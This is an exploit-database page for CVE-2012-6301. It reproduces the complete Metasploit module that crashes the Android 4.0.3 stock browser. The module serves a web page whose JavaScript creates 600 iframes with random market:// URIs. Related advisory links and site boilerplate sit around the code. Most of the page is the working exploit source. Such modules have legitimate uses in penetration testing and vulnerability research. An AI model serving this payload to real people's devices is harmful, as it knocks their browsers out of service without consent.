Lucene search
K

Android Stock Browser Iframe Denial of Service

🗓️ 31 Aug 2024 00:00:00Reported by Jean Pascal Pereira, Jonathan Waggoner, metasploit.comType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 183 Views

Android Stock Browser Iframe Denial of Service. This module exploits a vulnerability in the native browser that comes with Android 4.0.3. The browser will crash after viewing the webpage

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2012-6301
29 May 201815:50
circl
Check Point Advisories
Google Android Market URI Denial of Service (CVE-2012-6301)
14 Jan 201600:00
checkpoint_advisories
CVE
CVE-2012-6301
10 Dec 201220:00
cve
Cvelist
CVE-2012-6301
10 Dec 201220:00
cvelist
Metasploit
Android Stock Browser Iframe DOS
23 Mar 201616:10
metasploit
NVD
CVE-2012-6301
10 Dec 201220:55
nvd
Prion
Input validation
10 Dec 201220:55
prion
RedhatCVE
CVE-2012-6301
22 May 202504:12
redhatcve
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpServer  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => "Android Stock Browser Iframe DOS",  
'Description' => %q(  
This module exploits a vulnerability in the native browser that comes with Android 4.0.3.  
If successful, the browser will crash after viewing the webpage.  
),  
'License' => MSF_LICENSE,  
'Author' => [  
'Jean Pascal Pereira', # Original exploit discovery  
'Jonathan Waggoner' # Metasploit module  
],  
'References' => [  
[ 'PACKETSTORM', '118539'],  
[ 'CVE', '2012-6301' ]  
],  
'DisclosureDate' => '2012-12-01',  
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],  
'PassiveActions' => [ 'WebServer' ],  
'DefaultAction' => 'WebServer'  
)  
)  
end  
  
def run  
exploit # start http server  
end  
  
def setup  
@html = %|  
<html>  
<body>  
<script type="text/javascript">  
for (var i = 0; i < 600; i++)  
{  
var m_frame = document.createElement("iframe");  
m_frame.setAttribute("src", "market://#{Rex::Text.rand_text_alpha(rand(16) + 1)}");  
document.body.appendChild(m_frame);  
}  
</script>  
</body>  
</html>  
|  
end  
  
def on_request_uri(cli, _request)  
print_status('Sending response')  
send_response(cli, @html)  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Aug 2024 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
EPSS0.43028
183